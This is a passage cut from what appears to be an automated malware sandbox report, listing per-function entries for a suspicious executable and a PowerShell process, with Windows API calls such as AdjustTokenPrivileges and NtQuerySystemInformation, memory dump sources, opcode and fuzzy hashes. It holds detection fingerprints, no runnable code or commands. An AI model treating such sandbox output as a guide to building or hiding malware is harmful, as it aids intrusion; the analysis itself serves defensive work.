                                                    • Opcode Fuzzy Hash: 2d11554b7bf7e24eb09166834722e9104b6c4e6bc72cc062466fd5df7b1dc888
                                                    • Instruction Fuzzy Hash: 3BF0AF35504740DFEB20AF25D8C9765FBA0EF05B21F08C1DBDD494B752D3B5A508CAA2
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 01B8AA42, Relevance: 1.5, APIs: 1, Instructions: 34COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • GetConsoleOutputCP.KERNEL32 ref: 01B8AA71
                                                    Memory Dump Source
                                                    • Source File: 00000011.00000002.2133785597.0000000001B8A000.00000040.00000001.sdmp, Offset: 01B8A000, based on PE: false
                                                    Similarity
                                                    • API ID: ConsoleOutput
                                                    • String ID:
                                                    • API String ID: 3985236979-0
                                                    • Opcode ID: 114b0969be31db8b6ac53810aa69b6e43a57832d58d8f16ae70eb5c22bfbd3c7
                                                    • Instruction ID: eb975fef3b90e5f8081d944eede6d8bf3484fbd1b2bb6344282b547a72c45644
                                                    • Opcode Fuzzy Hash: 114b0969be31db8b6ac53810aa69b6e43a57832d58d8f16ae70eb5c22bfbd3c7
                                                    • Instruction Fuzzy Hash: 20F0A935900740DFEB10EF29D989761FBA0EB04A21F08C0DADD094BA52D7B8A508CAA2
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 01B8A974, Relevance: 1.3, APIs: 1, Instructions: 54COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • CloseHandle.KERNELBASE(?), ref: 01B8A9C8
                                                    Memory Dump Source
                                                    • Source File: 00000011.00000002.2133785597.0000000001B8A000.00000040.00000001.sdmp, Offset: 01B8A000, based on PE: false
                                                    Similarity
                                                    • API ID: CloseHandle
                                                    • String ID:
                                                    • API String ID: 2962429428-0
                                                    • Opcode ID: b1ac8f95a2a96b7d0888f017a4e796782e1a68786cba82af7a6b222b8d707e02
                                                    • Instruction ID: ab8589e38dd03f4f0a8dcbe994d7a2ede2e13e5c7288e115e68e307053afc726
                                                    • Opcode Fuzzy Hash: b1ac8f95a2a96b7d0888f017a4e796782e1a68786cba82af7a6b222b8d707e02
                                                    • Instruction Fuzzy Hash: EA11A3715093809FD712CF25DC89B92FFA4DF42221F0984EBED458F653D275A808CB61
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 01B8A996, Relevance: 1.3, APIs: 1, Instructions: 43COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • CloseHandle.KERNELBASE(?), ref: 01B8A9C8
                                                    Memory Dump Source
                                                    • Source File: 00000011.00000002.2133785597.0000000001B8A000.00000040.00000001.sdmp, Offset: 01B8A000, based on PE: false
                                                    Similarity
                                                    • API ID: CloseHandle
                                                    • String ID:
                                                    • API String ID: 2962429428-0
                                                    • Opcode ID: ef60ac2000aa4f81d1f31234eb74d34d4067fb23c62a5929151bfa9c29e0e707
                                                    • Instruction ID: 7c8af073fbe926b21713b13c233b5786f15029473fca702102e41f296f6cb7ac
                                                    • Opcode Fuzzy Hash: ef60ac2000aa4f81d1f31234eb74d34d4067fb23c62a5929151bfa9c29e0e707
                                                    • Instruction Fuzzy Hash: 2401A275504740DFEB10EF29DC897A6FB94DF44621F08C4EBDD098B642D775A804CB61
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 02AB07F7, Relevance: .0, Instructions: 43COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000011.00000002.2138395363.0000000002AB0000.00000040.00000040.sdmp, Offset: 02AB0000, based on PE: false
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 219b1bdede9842f53a73ada199dfae0eead9aa25ac45b8d3f2686cb044a563d4
                                                    • Instruction ID: 82dfb241c1ab2923d019c40bfb0a7e664471b9823b9cd14798edb60f512d78b3
                                                    • Opcode Fuzzy Hash: 219b1bdede9842f53a73ada199dfae0eead9aa25ac45b8d3f2686cb044a563d4
                                                    • Instruction Fuzzy Hash: A401D6B250D7806FD7128B169C40863FFB8DF87620709C4DFEC898B613D225A809CB72
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 02AB081E, Relevance: .0, Instructions: 27COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000011.00000002.2138395363.0000000002AB0000.00000040.00000040.sdmp, Offset: 02AB0000, based on PE: false
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 79a6d60f1840f73b40b53e3c1ee10c46aa46c3af7ac5183238c56646975b5a93
                                                    • Instruction ID: a61f6f421bece4308c2abefecae12633b07f4d41d04dc45319f6c9783ecd4fc2
                                                    • Opcode Fuzzy Hash: 79a6d60f1840f73b40b53e3c1ee10c46aa46c3af7ac5183238c56646975b5a93
                                                    • Instruction Fuzzy Hash: 3FE092B6A007009BD750DF0AEC85452F794EB84A31B18C47FDC0D8B700E575B508CAA1
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 02BA0860, Relevance: .0, Instructions: 26COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000011.00000002.2138539069.0000000002BA0000.00000040.00000001.sdmp, Offset: 02BA0000, based on PE: false
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: bd10793493363f3b684c8f7b47d595a3e5af78aaa400a3d79b7c65b0616d6dd2
                                                    • Instruction ID: aca69860554e4b55faf832b1a3a5502f3ba88cc2f60d7eca4b1a8adac572b903
                                                    • Opcode Fuzzy Hash: bd10793493363f3b684c8f7b47d595a3e5af78aaa400a3d79b7c65b0616d6dd2
                                                    • Instruction Fuzzy Hash: 2BE09A1124E3C04FC3076728A8611997FB29F83060B0A82EBC881CF593C5980C49D3A3
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 01B823F4, Relevance: .0, Instructions: 15COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000011.00000002.2133771275.0000000001B82000.00000040.00000001.sdmp, Offset: 01B82000, based on PE: false
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 9e72aac659d4e5a424d20a96916b86c8376bc4b82735c77a399797b4e4473b9e
                                                    • Instruction ID: 6ca1a73bfef9a35096165cf48084bd8a781843a2bca5485ceb0ec6e3f5725c07
                                                    • Opcode Fuzzy Hash: 9e72aac659d4e5a424d20a96916b86c8376bc4b82735c77a399797b4e4473b9e
                                                    • Instruction Fuzzy Hash: 0BD05E79204A818FE71A9A1CC1A5B953BA4AF55B04F4A44FAE940CB6A3C768E581D210
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 01B823BC, Relevance: .0, Instructions: 14COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000011.00000002.2133771275.0000000001B82000.00000040.00000001.sdmp, Offset: 01B82000, based on PE: false
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: f39a6c77c2b741f7a72d8b4560183de67a76499e9fc09a3b01867658b31f1153
                                                    • Instruction ID: c2b06f7d668e9affcd715945533cb7967164d943ab51fea601cdcb2777310a71
                                                    • Opcode Fuzzy Hash: f39a6c77c2b741f7a72d8b4560183de67a76499e9fc09a3b01867658b31f1153
                                                    • Instruction Fuzzy Hash: 8DD05E343006818FEB1ADA1CC1E4F5977E4AF40B00F0644E8BC008B666C3A4E980C600
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Non-executed Functions

                                                    Analysis Process: Bw6d8Paf6bOV36xS4N6.exe PID: 1192 Parent PID: 1388 Bw6d8Paf6bOV36xS4N6.exeCOMMON

                                                    Executed Functions

                                                    Function 001D1987, Relevance: 3.0, APIs: 2, Instructions: 26COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • KiUserExceptionDispatcher.NTDLL ref: 001D19B8
                                                    • KiUserExceptionDispatcher.NTDLL ref: 001D19CA
                                                    Memory Dump Source
                                                    • Source File: 00000014.00000002.2181492390.00000000001D0000.00000040.00000001.sdmp, Offset: 001D0000, based on PE: false
                                                    Similarity
                                                    • API ID: DispatcherExceptionUser
                                                    • String ID:
                                                    • API String ID: 6842923-0
                                                    • Opcode ID: 9986290feb52f7f1c6fd85115d1ee2d1ba113ba185643bdf1b1355458e71fc29
                                                    • Instruction ID: 261d0b41f5bc5283f958fc45876fd999f9be35d58d4ed339094b01b161d41587
                                                    • Opcode Fuzzy Hash: 9986290feb52f7f1c6fd85115d1ee2d1ba113ba185643bdf1b1355458e71fc29
                                                    • Instruction Fuzzy Hash: 69F01CB5D452098FCB84EF78D4695D97FF0FF98200B11866AC54A9BA16EB342642CF40
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 001D1998, Relevance: 3.0, APIs: 2, Instructions: 18COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • KiUserExceptionDispatcher.NTDLL ref: 001D19B8
                                                    • KiUserExceptionDispatcher.NTDLL ref: 001D19CA
                                                    Memory Dump Source
                                                    • Source File: 00000014.00000002.2181492390.00000000001D0000.00000040.00000001.sdmp, Offset: 001D0000, based on PE: false
                                                    Similarity
                                                    • API ID: DispatcherExceptionUser
                                                    • String ID:
                                                    • API String ID: 6842923-0
                                                    • Opcode ID: c94f9b30203429ead2267da19c99bb8caa8b822dde94a4e7412265a8bfec64e5
                                                    • Instruction ID: b21bd96c9cc0fc927403acfd1400dda80a70bdeaca3b9eda10e8ff784ce47159
                                                    • Opcode Fuzzy Hash: c94f9b30203429ead2267da19c99bb8caa8b822dde94a4e7412265a8bfec64e5
                                                    • Instruction Fuzzy Hash: 89E01AB89042099F8744EF68E8445597BF0FB4C200B11856AC80AD3715EB345941CF90
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 0017D01C, Relevance: .1, Instructions: 72COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000014.00000002.2181397137.000000000017D000.00000040.00000001.sdmp, Offset: 0017D000, based on PE: false
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 80bb61cd9ac72250f257f28bfbf837dbb5afff2bcb6aa6538118fccd2e344e3c
                                                    • Instruction ID: d27d3c5e95518e52003fbc8dc52dfdc7258f83b5557831fa0b070b6754e4cc30
                                                    • Opcode Fuzzy Hash: 80bb61cd9ac72250f257f28bfbf837dbb5afff2bcb6aa6538118fccd2e344e3c
                                                    • Instruction Fuzzy Hash: CD21C275604248DFDB14DF64E984B16BBB5EF88314F24C9A9E80D4B346C336D857CBA1
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 0017D006, Relevance: .1, Instructions: 62COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000014.00000002.2181397137.000000000017D000.00000040.00000001.sdmp, Offset: 0017D000, based on PE: false
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: d1700bc627077445881ccf50647105a7c1c58688abe36ab452bc5987d94b425a
                                                    • Instruction ID: b8869592c909ac21c2eb3fc3572bdc4f3e37cbf0d58d7e81a14b19e07cf2342b
                                                    • Opcode Fuzzy Hash: d1700bc627077445881ccf50647105a7c1c58688abe36ab452bc5987d94b425a
                                                    • Instruction Fuzzy Hash: 3C215B755093848FCB12CF24D994B15BF71EF46314F28C5EAD8498B6A7C33A984ACB62
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Non-executed Functions

                                                    Analysis Process: powershell.exe PID: 1552 Parent PID: 2368 powershell.exeCOMMON

                                                    Executed Functions

                                                    Function 003CACB7, Relevance: 1.6, APIs: 1, Instructions: 75COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • AdjustTokenPrivileges.KERNELBASE(?,?,?,?,?,?), ref: 003CAD37
                                                    Memory Dump Source
                                                    • Source File: 00000016.00000002.2165357993.00000000003CA000.00000040.00000001.sdmp, Offset: 003CA000, based on PE: false
                                                    Similarity
                                                    • API ID: AdjustPrivilegesToken
                                                    • String ID:
                                                    • API String ID: 2874748243-0
                                                    • Opcode ID: 37ab7cd371e2563a0498a6091ed000bdf12f6e666a2b53965d846431fbdef7f0
                                                    • Instruction ID: 5b7d0f05b44e2985fbab70b1beae34b902d0dcef2977792b0a7d402eb355ced7
                                                    • Opcode Fuzzy Hash: 37ab7cd371e2563a0498a6091ed000bdf12f6e666a2b53965d846431fbdef7f0
                                                    • Instruction Fuzzy Hash: 5021EF761097849FEB238F25DC44B92BFB4EF06314F09849AE985CB563D230A908CB62
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 003CACEE, Relevance: 1.6, APIs: 1, Instructions: 52COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • AdjustTokenPrivileges.KERNELBASE(?,?,?,?,?,?), ref: 003CAD37
                                                    Memory Dump Source
                                                    • Source File: 00000016.00000002.2165357993.00000000003CA000.00000040.00000001.sdmp, Offset: 003CA000, based on PE: false
                                                    Similarity
                                                    • API ID: AdjustPrivilegesToken
                                                    • String ID:
                                                    • API String ID: 2874748243-0
                                                    • Opcode ID: 83198a5a548cf207035412d5411e5d8d26ab0bb89ef8df0b2880d837659d6fb0
                                                    • Instruction ID: e4de62c1a366254535661639773bc8713ff8797635716cb3107968fd76e94923
                                                    • Opcode Fuzzy Hash: 83198a5a548cf207035412d5411e5d8d26ab0bb89ef8df0b2880d837659d6fb0
                                                    • Instruction Fuzzy Hash: FB118F76500B049FDB218F55D844B56FBE4EB04311F04C46EDD46CAA12D231E814DB62
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 003CB2CC, Relevance: 1.6, APIs: 1, Instructions: 50nativeCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • NtQuerySystemInformation.NTDLL(?,?,?,?), ref: 003CB329
                                                    Memory Dump Source
                                                    • Source File: 00000016.00000002.2165357993.00000000003CA000.00000040.00000001.sdmp, Offset: 003CA000, based on PE: false
                                                    Similarity
                                                    • API ID: InformationQuerySystem
                                                    • String ID:
                                                    • API String ID: 3562636166-0
                                                    • Opcode ID: 5bdeebcec733b7983ea6ad6f949973100d92df477538aaa419abab3a8ef9e731
                                                    • Instruction ID: f47760763c202a6f3e839e1e35916f0a4a94ffd6804bd4745db9d828644098e6
                                                    • Opcode Fuzzy Hash: 5bdeebcec733b7983ea6ad6f949973100d92df477538aaa419abab3a8ef9e731
                                                    • Instruction Fuzzy Hash: 4B119E76508380AFDB228F11DC45F62FFB4EF46320F09C49EED844B662C275A918DB62
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 003CB2EE, Relevance: 1.5, APIs: 1, Instructions: 38nativeCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • NtQuerySystemInformation.NTDLL(?,?,?,?), ref: 003CB329
                                                    Memory Dump Source
                                                    • Source File: 00000016.00000002.2165357993.00000000003CA000.00000040.00000001.sdmp, Offset: 003CA000, based on PE: false
                                                    Similarity
                                                    • API ID: InformationQuerySystem
                                                    • String ID:
                                                    • API String ID: 3562636166-0
                                                    • Opcode ID: b911b2f34ac7e8e4b7e65fd5072059dbf3a494051602aa697be2522fad34fd3a
                                                    • Instruction ID: 2336956b072a43394a141fa93d02c5597b3a8b98eb7c7661d24ebd48538c3c2e
                                                    • Opcode Fuzzy Hash: b911b2f34ac7e8e4b7e65fd5072059dbf3a494051602aa697be2522fad34fd3a
                                                    • Instruction Fuzzy Hash: A0018B36400740DFEB219F45D886B26FBA0EF15721F18C49EDD898A612C371A818DB62
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 02740118, Relevance: 1.6, APIs: 1, Instructions: 100COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • SetConsoleTitleW.KERNEL32(?), ref: 027401D0
                                                    Memory Dump Source
                                                    • Source File: 00000016.00000002.2180209790.0000000002740000.00000040.00000001.sdmp, Offset: 02740000, based on PE: false
                                                    Similarity
                                                    • API ID: ConsoleTitle
                                                    • String ID:
                                                    • API String ID: 3358957663-0
                                                    • Opcode ID: c7eba2ccddf21ccfdda58416dcbf778227705173e025cf37537e1086447e3b42
                                                    • Instruction ID: 8c4da3bafc7f6ba22d0f905874779c3b4f6a3ed3ef80002411bcae660dde0859
                                                    • Opcode Fuzzy Hash: c7eba2ccddf21ccfdda58416dcbf778227705173e025cf37537e1086447e3b42
                                                    • Instruction Fuzzy Hash: 8731487650E3C08FE7138B759C65692BFB4AF43210F0E84DBD984CF1A3D6299809DB62
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 0274067A, Relevance: 1.6, APIs: 1, Instructions: 93fileCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • CreateFileW.KERNELBASE(?,?,?,?,?,?), ref: 0274072D
                                                    Memory Dump Source
                                                    • Source File: 00000016.00000002.2180209790.0000000002740000.00000040.00000001.sdmp, Offset: 02740000, based on PE: false
                                                    Similarity
                                                    • API ID: CreateFile
                                                    • String ID:
                                                    • API String ID: 823142352-0
                                                    • Opcode ID: 28f85c7102ca48c3098ea6975f34a43d424115b83e8da23cc6df54a02432dfd0
                                                    • Instruction ID: ab138cc4578ffe97208b997fc9703e8df1e44319a5ca15448a945784bbc2fb8b
                                                    • Opcode Fuzzy Hash: 28f85c7102ca48c3098ea6975f34a43d424115b83e8da23cc6df54a02432dfd0
                                                    • Instruction Fuzzy Hash: 95316471505340AFE722CF65CC45F56BFF8EF06210F09849EE9858B292D775A908CB62
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 02740D32, Relevance: 1.6, APIs: 1, Instructions: 89registryCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • RegisterEventSourceW.ADVAPI32(?), ref: 02740DD6
                                                    Memory Dump Source
                                                    • Source File: 00000016.00000002.2180209790.0000000002740000.00000040.00000001.sdmp, Offset: 02740000, based on PE: false
                                                    Similarity
                                                    • API ID: EventRegisterSource
                                                    • String ID:
                                                    • API String ID: 1693822063-0
                                                    • Opcode ID: 110753d2024e51e7773ed35ef2a1e1aa39eded2ac88e31631fbd21380b5dc85f
                                                    • Instruction ID: 7e64b8cb1e1f446bd1a60632322f800f3dc108a0b1483bd8f47174d3c39e1ce3
                                                    • Opcode Fuzzy Hash: 110753d2024e51e7773ed35ef2a1e1aa39eded2ac88e31631fbd21380b5dc85f
                                                    • Instruction Fuzzy Hash: 15319871509380AFE712DB25DC45B96BFE8DF06214F0884AEE944CF293D775A909CB71
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 003CAF24, Relevance: 1.6, APIs: 1, Instructions: 88COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • K32EnumProcessModules.KERNEL32(?,00000E9C,98F50E52,00000000,00000000,00000000,00000000), ref: 003CAFBE
                                                    Memory Dump Source
                                                    • Source File: 00000016.00000002.2165357993.00000000003CA000.00000040.00000001.sdmp, Offset: 003CA000, based on PE: false
                                                    Similarity
                                                    • API ID: EnumModulesProcess
                                                    • String ID:
                                                    • API String ID: 1082081703-0
                                                    • Opcode ID: 204e15445a975ddb6efccf9fe1276e8cd1e8b36304c0fec8208dd0c93d437ecc
                                                    • Instruction ID: bb0e5a5f3bb7d378d6cf6b1cbb1be2e5f24d7d45a24fda944e2ebc89d603e4b9
                                                    • Opcode Fuzzy Hash: 204e15445a975ddb6efccf9fe1276e8cd1e8b36304c0fec8208dd0c93d437ecc
                                                    • Instruction Fuzzy Hash: 9221A5B2509780AFE7128B20DC45F96BFB8EF06320F0984DBE985DB193D2659945C761
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 003CBD1E, Relevance: 1.6, APIs: 1, Instructions: 88COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • GetTokenInformation.KERNELBASE(?,00000E9C,98F50E52,00000000,00000000,00000000,00000000), ref: 003CBDBC
                                                    Memory Dump Source
                                                    • Source File: 00000016.00000002.2165357993.00000000003CA000.00000040.00000001.sdmp, Offset: 003CA000, based on PE: false
                                                    Similarity
                                                    • API ID: InformationToken
                                                    • String ID:
                                                    • API String ID: 4114910276-0
                                                    • Opcode ID: f3a190424b1d487bcc487fae52ae1391629ce4bf475acbbe5b7f116d6aa6fbae
                                                    • Instruction ID: fe07b678e488f0e71bccccf8066e752ad8217fd0ebc491f0aaa8a5ee76b2a00c
                                                    • Opcode Fuzzy Hash: f3a190424b1d487bcc487fae52ae1391629ce4bf475acbbe5b7f116d6aa6fbae
                                                    • Instruction Fuzzy Hash: 6A318172509380AFE722CB61DC55F96BFB8EF06310F09859BE985DB192D225A908C7A1
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 02740FEE, Relevance: 1.6, APIs: 1, Instructions: 84COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • GetVolumeInformationW.KERNELBASE(?,00000E9C,?,?), ref: 0274109E
                                                    Memory Dump Source
                                                    • Source File: 00000016.00000002.2180209790.0000000002740000.00000040.00000001.sdmp, Offset: 02740000, based on PE: false
                                                    Similarity
                                                    • API ID: InformationVolume
                                                    • String ID:
                                                    • API String ID: 2039140958-0
                                                    • Opcode ID: 09641359b710399456bc56debb8dd2706367f4c32a3776cc6d92fbd11e2c9d24
                                                    • Instruction ID: 419fa9c83f776c0908d598f16d412fd034f3b88554a6e65c24badc43915ab645
                                                    • Opcode Fuzzy Hash: 09641359b710399456bc56debb8dd2706367f4c32a3776cc6d92fbd11e2c9d24
                                                    • Instruction Fuzzy Hash: 4231737550E3C05FD3138B358C55B55BFB4AF43610F1A81DBD884CF1A3D629A909C7A2
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 003CB01D, Relevance: 1.6, APIs: 1, Instructions: 82COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • K32GetModuleInformation.KERNEL32(?,00000E9C,98F50E52,00000000,00000000,00000000,00000000), ref: 003CB0AE
                                                    Memory Dump Source
                                                    • Source File: 00000016.00000002.2165357993.00000000003CA000.00000040.00000001.sdmp, Offset: 003CA000, based on PE: false
                                                    Similarity
                                                    • API ID: InformationModule
                                                    • String ID:
                                                    • API String ID: 3425974696-0
                                                    • Opcode ID: 8e181ca01024d2cf4890ba04726cebe1c1760dfb92caf2f62e58134528367c2c
                                                    • Instruction ID: cf5f61bd114584f8ab6f51dbdc409093be931cc38ef24c8f5fe4506bd64511e3
                                                    • Opcode Fuzzy Hash: 8e181ca01024d2cf4890ba04726cebe1c1760dfb92caf2f62e58134528367c2c
                                                    • Instruction Fuzzy Hash: EB219172505380AFE722CB15CC45FA7FFA8EF46320F0984AEE945DB152D764A908CB61
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 003CA1A8, Relevance: 1.6, APIs: 1, Instructions: 80COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • SetConsoleCtrlHandler.KERNEL32(?,00000E9C,?,?), ref: 003CA23E
                                                    Memory Dump Source
                                                    • Source File: 00000016.00000002.2165357993.00000000003CA000.00000040.00000001.sdmp, Offset: 003CA000, based on PE: false
                                                    Similarity
                                                    • API ID: ConsoleCtrlHandler
                                                    • String ID:
                                                    • API String ID: 1513847179-0
                                                    • Opcode ID: 5ce9bf59ab3301f8e3ad43101dc7473b01a9e6f9c40f334fb38dd0dde07e312a
                                                    • Instruction ID: a0ade3243a905b61e23766f6c63c0fb9809751758df80a863d79d2096a6d5bf2
                                                    • Opcode Fuzzy Hash: 5ce9bf59ab3301f8e3ad43101dc7473b01a9e6f9c40f334fb38dd0dde07e312a
                                                    • Instruction Fuzzy Hash: 1221C77140D3C06FD3128B258C55B66BFB4EF47620F1A85DFD984CF193D229A919C7A2
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 02740784, Relevance: 1.6, APIs: 1, Instructions: 78COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • GetFileType.KERNELBASE(?,00000E9C,98F50E52,00000000,00000000,00000000,00000000), ref: 02740819
                                                    Memory Dump Source
                                                    • Source File: 00000016.00000002.2180209790.0000000002740000.00000040.00000001.sdmp, Offset: 02740000, based on PE: false
                                                    Similarity
                                                    • API ID: FileType
                                                    • String ID:
                                                    • API String ID: 3081899298-0
                                                    • Opcode ID: a067845ad7fb0cc7d8d980eedd65cc65888900f947f7de3560a1782948639940
                                                    • Instruction ID: 8d0e98a1a33b42fb33bc872d49e70c3644ffd7d20a513c366df82336377873c5
                                                    • Opcode Fuzzy Hash: a067845ad7fb0cc7d8d980eedd65cc65888900f947f7de3560a1782948639940
                                                    • Instruction Fuzzy Hash: BB21F876408780AFE712CB159C41FA3BFA8EF46720F0881DAE9848B193D324A905C771
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 02740464, Relevance: 1.6, APIs: 1, Instructions: 77COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • SHGetFolderPathW.SHELL32(?,00000E9C,?,?), ref: 02740502
                                                    Memory Dump Source
                                                    • Source File: 00000016.00000002.2180209790.0000000002740000.00000040.00000001.sdmp, Offset: 02740000, based on PE: false
                                                    Similarity
                                                    • API ID: FolderPath
                                                    • String ID:
                                                    • API String ID: 1514166925-0
                                                    • Opcode ID: 82a3e9f02581b805bcceebbc28836cf1c932df261e18a9eecac28289869efb3c
                                                    • Instruction ID: 23ac8179998c93342e3d2f5b25fc3434feced1ac232e6b4bfdc566ca28de9401
                                                    • Opcode Fuzzy Hash: 82a3e9f02581b805bcceebbc28836cf1c932df261e18a9eecac28289869efb3c
                                                    • Instruction Fuzzy Hash: 9321607640E3C0AFD3128B258C55B66BFB4EF47610F1A81DFD8848F693D225A919C7A2
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 027406AE, Relevance: 1.6, APIs: 1, Instructions: 76fileCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • CreateFileW.KERNELBASE(?,?,?,?,?,?), ref: 0274072D
                                                    Memory Dump Source
                                                    • Source File: 00000016.00000002.2180209790.0000000002740000.00000040.00000001.sdmp, Offset: 02740000, based on PE: false
                                                    Similarity
                                                    • API ID: CreateFile
                                                    • String ID:
                                                    • API String ID: 823142352-0
                                                    • Opcode ID: 4ea86e14ec0dec2c9a77b1cbcf1f8e10829b06bc15fe04715d1bb4b15aeb2776
                                                    • Instruction ID: 600869cf0cfefa2de49f8df7a5c0f8309e3dea8c7a66d139530c28b360546ad7
                                                    • Opcode Fuzzy Hash: 4ea86e14ec0dec2c9a77b1cbcf1f8e10829b06bc15fe04715d1bb4b15aeb2776
                                                    • Instruction Fuzzy Hash: 62219D71500704EFEB21DF65CC85F66FBE8EF08650F04846EEA899B292D771E904CB62
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 02740854, Relevance: 1.6, APIs: 1, Instructions: 75fileCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • ReadFile.KERNELBASE(?,00000E9C,98F50E52,00000000,00000000,00000000,00000000), ref: 027408E5
                                                    Memory Dump Source
                                                    • Source File: 00000016.00000002.2180209790.0000000002740000.00000040.00000001.sdmp, Offset: 02740000, based on PE: false
                                                    Similarity
                                                    • API ID: FileRead
                                                    • String ID:
                                                    • API String ID: 2738559852-0
                                                    • Opcode ID: 4953224fc16e6716dc78b54b903a3bc7d8333fe63d97ab1c27b929565f8d9a54
                                                    • Instruction ID: db14112a1bb84a8ff1de6e218b49767c25123584a6a4943f738f47d92b092f66
                                                    • Opcode Fuzzy Hash: 4953224fc16e6716dc78b54b903a3bc7d8333fe63d97ab1c27b929565f8d9a54
                                                    • Instruction Fuzzy Hash: C4219272409380AFE722CF61DC45F56BFB8EF46314F09849FE9449B153C275A909CB61
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 003CA8B4, Relevance: 1.6, APIs: 1, Instructions: 74COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • VerLanguageNameW.KERNELBASE(?,00000E9C,?,?), ref: 003CA94A
                                                    Memory Dump Source
                                                    • Source File: 00000016.00000002.2165357993.00000000003CA000.00000040.00000001.sdmp, Offset: 003CA000, based on PE: false
                                                    Similarity
                                                    • API ID: LanguageName
                                                    • String ID:
                                                    • API String ID: 2060303382-0
                                                    • Opcode ID: 83805e7b27e70c763a77259ea7c0b60585e36192762308ae01ffe70f125ec7dd
                                                    • Instruction ID: 8ef2aca0dcd775c54f21c43f8df8cf5c38460adb45450ef0e1ef875cc407dd1d
                                                    • Opcode Fuzzy Hash: 83805e7b27e70c763a77259ea7c0b60585e36192762308ae01ffe70f125ec7dd
                                                    • Instruction Fuzzy Hash: E621A77540D780AFD3138B25DC51B62BFB4EF87B10F1981DBE8848B653D224A919C7B2
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 02740D66, Relevance: 1.6, APIs: 1, Instructions: 71registryCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • RegisterEventSourceW.ADVAPI32(?), ref: 02740DD6
                                                    Memory Dump Source
                                                    • Source File: 00000016.00000002.2180209790.0000000002740000.00000040.00000001.sdmp, Offset: 02740000, based on PE: false
                                                    Similarity
                                                    • API ID: EventRegisterSource
                                                    • String ID:
                                                    • API String ID: 1693822063-0
                                                    • Opcode ID: dd2966e21e980b86d7dd84987899c2b55349a029187ae8fe972a132ce6465d3d
                                                    • Instruction ID: 9de3e7bfe2698d855ec8d990459c2055ad7543c401143884836774a5154a4e55
                                                    • Opcode Fuzzy Hash: dd2966e21e980b86d7dd84987899c2b55349a029187ae8fe972a132ce6465d3d
